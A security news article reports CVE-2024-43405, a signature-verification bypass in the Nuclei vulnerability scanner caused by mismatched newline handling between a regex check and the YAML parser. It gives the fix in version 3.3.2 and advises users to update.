A critical security vulnerability has been identified in ProjectDiscovery’s Nuclei, a prominent open-source vulnerability scanner. This flaw poses a significant risk, as it may enable attackers to circumvent signature checks and execute harmful code within the system.
The vulnerability, designated as CVE-2024-43405, has received a CVSS score of 7.4 out of 10, indicating a high level of severity. It affects all Nuclei versions beyond 3.0.0, thereby impacting a broad range of users.
According to reports, the issue arises from inconsistencies in how newline characters are handled during the signature verification process, particularly in conjunction with the YAML parser’s interpretation of templates. A detailed analysis describes how this enables malicious content to be injected into templates while still retaining a valid signature for the innocuous parts.
The Nuclei scanner, designed to detect vulnerabilities across modern applications, cloud infrastructures, and networks, utilizes templates—structured YAML files that issue specific requests to identify security weaknesses. Furthermore, it allows for external code execution through the code protocol, enhancing the flexibility and efficacy of security testing workflows.
Wiz, a cloud security company that uncovered CVE-2024-43405, attributed the vulnerability to flaws in the template signature verification process. This process is crucial for maintaining the integrity of templates pulled from the official repository.
Exploiting this flaw allows attackers to bypass this essential verification, enabling them to create malicious templates capable of executing arbitrary code and accessing sensitive data from the affected systems. Wiz researcher Guy Goldenberg noted that this signature verification is currently the sole method for validating Nuclei templates, positioning it as a potential single point of failure.
The root of the problem lies in the conflicting parsing logic of regex used for signature validation and the YAML parser. This conflict allows an attacker to insert a “\r” character, circumventing regex checks while being interpreted as a line break by the YAML parser. As a result, this unique parsing inconsistency can be exploited to craft a Nuclei template that includes multiple “# digest:” lines, effectively evading verification while executing malicious code.
Importantly, the signature verification process only validates the initial “# digest:” line, ignoring any subsequent lines which can still be processed by the YAML parser. Thus, any additional “# digest:” lines remain unverified but executable, exacerbating the potential risk.
After a responsible disclosure period, ProjectDiscovery addressed this vulnerability on September 4, 2024, with the release of version 3.3.2. The latest version of Nuclei is now 3.3.7 and users are strongly encouraged to update to mitigate this risk.
Goldenberg cautions that this vulnerability could be exploited if organizations utilize unverified or community-contributed templates without adequate safeguards. Such practices could permit attackers to deploy harmful templates, potentially leading to arbitrary command execution or data exfiltration, thus undermining the security of the host system.
This incident underscores the necessity for diligent template validation and safeguarding in vulnerability scanning tools, particularly in a landscape increasingly prone to sophisticated cyber assaults. Business owners and security professionals should remain vigilant and well-informed to mitigate the growing risks of such vulnerabilities in their security frameworks.
